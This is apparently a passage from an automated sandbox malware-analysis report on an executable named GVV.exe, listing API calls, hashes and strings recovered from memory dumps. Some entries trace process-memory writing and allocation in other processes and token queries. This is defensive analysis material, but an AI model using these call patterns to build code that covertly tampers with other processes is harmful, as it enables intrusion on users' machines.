                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AsyncState$ClientCursorScreen
                • String ID:
                • API String ID: 4210589936-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetInputState.USER32 ref: 001838CB
                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00183922
                • TranslateMessage.USER32(?), ref: 0018394B
                • DispatchMessageW.USER32(?), ref: 00183955
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00183966
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                • String ID:
                • API String ID: 2256411358-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0018CF38
                • InternetReadFile.WININET(?,00000000,?,?), ref: 0018CF6F
                • GetLastError.KERNEL32(?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFB4
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFC8
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFF2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 3191363074-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32(?,?), ref: 00171915
                • PostMessageW.USER32(00000001,00000201,00000001), ref: 001719C1
                • Sleep.KERNEL32(00000000,?,?,?), ref: 001719C9
                • PostMessageW.USER32(00000001,00000202,00000000), ref: 001719DA
                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001719E2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePostSleep$RectWindow
                • String ID:
                • API String ID: 3382505437-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001A5745
                • SendMessageW.USER32(?,00001074,?,00000001), ref: 001A579D
                • _wcslen.LIBCMT ref: 001A57AF
                • _wcslen.LIBCMT ref: 001A57BA
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A5816
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$_wcslen
                • String ID:
                • API String ID: 763830540-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsWindow.USER32(00000000), ref: 00190951
                • GetForegroundWindow.USER32 ref: 00190968
                • GetDC.USER32(00000000), ref: 001909A4
                • GetPixel.GDI32(00000000,?,00000003), ref: 001909B0
                • ReleaseDC.USER32(00000000,00000003), ref: 001909E8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ForegroundPixelRelease
                • String ID:
                • API String ID: 4156661090-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0014CDC6
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014CDE9
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0014CE0F
                • _free.LIBCMT ref: 0014CE22
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014CE31
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                • SelectObject.GDI32(?,00000000), ref: 001296A2
                • BeginPath.GDI32(?), ref: 001296B9
                • SelectObject.GDI32(?,00000000), ref: 001296E2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ObjectSelect$BeginCreatePath
                • String ID:
                • API String ID: 3225163088-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,0013F2DE,00143863,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6), ref: 00142DFD
                • _free.LIBCMT ref: 00142E32
                • _free.LIBCMT ref: 00142E59
                • SetLastError.KERNEL32(00000000,00111129), ref: 00142E66
                • SetLastError.KERNEL32(00000000,00111129), ref: 00142E6F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?,?,0017035E), ref: 0017002B
                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170046
                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170054
                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?), ref: 00170064
                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170070
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: From$Prog$FreeStringTasklstrcmpi
                • String ID:
                • API String ID: 3897988419-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • QueryPerformanceCounter.KERNEL32(?), ref: 0017E997
                • QueryPerformanceFrequency.KERNEL32(?), ref: 0017E9A5
                • Sleep.KERNEL32(00000000), ref: 0017E9AD
                • QueryPerformanceCounter.KERNEL32(?), ref: 0017E9B7
                • Sleep.KERNEL32 ref: 0017E9F3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                • String ID:
                • API String ID: 842720411-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00170FCA
                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00170FD6
                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00170FE5
                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00170FEC
                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00171002
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapInformationToken$AllocErrorLastProcess
                • String ID:
                • API String ID: 44706859-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0017102A
                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00171036
                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171045
                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0017104C
                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171062
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapInformationToken$AllocErrorLastProcess
                • String ID:
                • API String ID: 44706859-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180324
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180331
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 0018033E
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 0018034B
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180358
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180365
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: c0165e27ba4e602321bcb64dda1d7110376cc20afe78ed0ba153412cd2c24f72
                • Instruction ID: 8f2509d6045e8451a7850e31a8b81036201b77d9f3001ef74bda79bf5d677f3f
                • Instruction Fuzzy Hash: 1C01AE72801B19DFCB31AF66D880812FBF9BF643153158A3FD19652931C7B1AA98DF80
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 0014D752
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014D764
                • _free.LIBCMT ref: 0014D776
                • _free.LIBCMT ref: 0014D788
                • _free.LIBCMT ref: 0014D79A
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: bd190dc136e5ace80602a9015dc3d48ad4edb82adf9a98f0031d902f07f30b7c
                • Instruction ID: 4f2a5a596cecf4d918e432776660deb8249cbfe358d26ea9386a0b852e25869c
                • Instruction Fuzzy Hash: B0F09633542215AB8A25EB65F9C2C167BDDBB043197D40C06F048D7921C730FCC0C6A0
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • GetDlgItem.USER32(?,000003E9), ref: 00175C58
                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00175C6F
                • MessageBeep.USER32(00000000), ref: 00175C87
                • KillTimer.USER32(?,0000040A), ref: 00175CA3
                • EndDialog.USER32(?,00000001), ref: 00175CBD
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 5ded3eb9e3054265b1a8a59981d05a97c4beba3242a6190a5f1dd50e38df6c7c
                • Instruction ID: 3bd448da768c416eb9284012dc8f13e086afeb047bbf1d177cf2752553939452
                • Instruction Fuzzy Hash: A901A430500B04ABEB259B10DD4EFA677BDBF11B05F044569B58BA15E1DBF0A9C4CBD0
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 001422BE
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 001422D0
                • _free.LIBCMT ref: 001422E3
                • _free.LIBCMT ref: 001422F4
                • _free.LIBCMT ref: 00142305
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 24ffc6d5c0bf9248f3acafcb99116908732f1f171f8beb347187701e21913ece
                • Instruction ID: 602dac77da5ccc51ba6bb08709df9271aae7c11f97a282c9708936895d792918
                • Instruction Fuzzy Hash: 1BF01D708021A2AB9A13AFD5EC8180C3B64F728B607900507F410DB671C77118D2AEE4
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • EndPath.GDI32(?), ref: 001295D4
                • StrokeAndFillPath.GDI32(?,?,001671F7,00000000,?,?,?), ref: 001295F0
                • SelectObject.GDI32(?,00000000), ref: 00129603
                • DeleteObject.GDI32 ref: 00129616
                • StrokePath.GDI32(?), ref: 00129631
                Similarity
                • API ID: Path$ObjectStroke$DeleteFillSelect
                • String ID:
                • API String ID: 2625713937-0
                • Opcode ID: f7814ae4c2bfac13059074e253c1e49cdf8b75947764e4a4f91da297df80e49c
                • Instruction ID: 882865ad8f90f97e2cdb7db75a85adc071538c29d39c6dbe05d634d8b1ef0503
                • Instruction Fuzzy Hash: F2F04F34005344FBDB165FA9ED5C7683FA1BB02326F048214F425598F2CB3489E5DF60
                Uniqueness
                • Uniqueness Score: -1.00%

                Similarity
                • API ID: __freea$_free
                • String ID: a/p$am/pm
                • API String ID: 3432400110-3206640213
                • Opcode ID: a7a3582eed02333fb7d4fd95b6da0c68f5a70339006e8408c674361bb4bc1e5c
                • Instruction ID: aa8d0541b16c365589a806f8fbd611369897366b417dae10b0650a1f9d30020e
                • Instruction Fuzzy Hash: 5DD12331A10206FACB289F68C895BFEBBB1FF05720F294119E915AB670D3759DC0CB91
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00130242: EnterCriticalSection.KERNEL32(001E070C,001E1884,?,?,0012198B,001E2518,?,?,?,001112F9,00000000), ref: 0013024D
                  • Part of subcall function 00130242: LeaveCriticalSection.KERNEL32(001E070C,?,0012198B,001E2518,?,?,?,001112F9,00000000), ref: 0013028A
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 001300A3: __onexit.LIBCMT ref: 001300A9
                • __Init_thread_footer.LIBCMT ref: 00197BFB
                  • Part of subcall function 001301F8: EnterCriticalSection.KERNEL32(001E070C,?,?,00128747,001E2514), ref: 00130202
                  • Part of subcall function 001301F8: LeaveCriticalSection.KERNEL32(001E070C,?,00128747,001E2514), ref: 00130235
                Similarity
                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                • String ID: 5$G$Variable must be of type 'Object'.
                • API String ID: 535116098-3733170431
                • Opcode ID: 85ae49eb5405b5e35364a285de2137bd20193557f59afb60ad51e7fdafcd0915
                • Instruction ID: e1a2a799c002adc555b0a5a928a499954b5dd06be4a955ecf2b8633810de4513
                • Instruction Fuzzy Hash: 02918A74A14209EFCF09EF94D9919ADB7F2FF59300F148059F806AB292DB71AE81CB51
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0017B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001721D0,?,?,00000034,00000800,?,00000034), ref: 0017B42D
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00172760
                  • Part of subcall function 0017B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0017B3F8
                  • Part of subcall function 0017B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0017B355
                  • Part of subcall function 0017B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00172194,00000034,?,?,00001004,00000000,00000000), ref: 0017B365
                  • Part of subcall function 0017B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00172194,00000034,?,?,00001004,00000000,00000000), ref: 0017B37B
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001727CD
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017281A
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: bf464eb8b045a80cf1a54e60d22d922bb0838be579986a203943f5823fe1b09a
                • Instruction ID: ebf185b9fe54df90cc8f83c163beb255ad0330313fa4653ef5aac8cfd31679a3
                • Instruction Fuzzy Hash: D6411D72900218AFDB10DBA4CD85BDEBBB8AF15700F108095FA59B7181DB716E85CBA1
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GVV.exe,00000104), ref: 00141769
                • _free.LIBCMT ref: 00141834
                • _free.LIBCMT ref: 0014183E
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\GVV.exe
                • API String ID: 2506810119-1218256066
                • Opcode ID: 1ec7deb86a97f0d44c779427d8b6495c2c1bbfa17046cc1c3148b634e6d9f576
                • Instruction ID: afa4a80e3ed9f0630f3b9ac93f268f099262a9d38de1026897a6e4deb24229da
                • Instruction Fuzzy Hash: B1318C71A40259FBDB21DB99DC81D9EBBFCEB99310B24416AF9049B221D7708AC0CB90
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0017C306
                • DeleteMenu.USER32(?,00000007,00000000), ref: 0017C34C
                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E1990,00DE58C8), ref: 0017C395
                Similarity
                • API ID: Menu$Delete$InfoItem
                • String ID: 0
                • API String ID: 135850232-4108050209
                • Opcode ID: a697141184a4ceaef9da81332e625d48a85447212fd81fee845bb527718370f4
                • Instruction ID: 652c4f973c6ab3a948b65daf3c5d0bfaf752bd3302faa94058d23c7da06e7187
                • Instruction Fuzzy Hash: 5B418E712083019FD724DF25D884B6ABBF4BF95320F14CA1DF9A9972D1D730A904CBA2
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001ACC08,00000000,?,?,?,?), ref: 001A44AA
                • GetWindowLongW.USER32 ref: 001A44C7
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A44D7
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: 13747953a538d892f149e29b4402a954a272ca50e9da759a6da15678c905c56e
                • Instruction ID: b9ea282f645e49eadf7436dcd4d98f7778022ad3efc2c23c22e1594a57018479
                • Instruction Fuzzy Hash: 0B31A035210605AFDF248F78DC45BEA7BA9EB4A334F204725F979921D0D7B0EC909B90
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0019335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00193077,?,?), ref: 00193378
                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                • _wcslen.LIBCMT ref: 0019309B
                • htons.WSOCK32(00000000,?,?,00000000), ref: 00193106
                Similarity
                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                • String ID: 255.255.255.255
                • API String ID: 946324512-2422070025
                • Opcode ID: 0da5b0b4205ca88920c322217aac7defca95dfa5d217b956a4d6cbb908399b2a
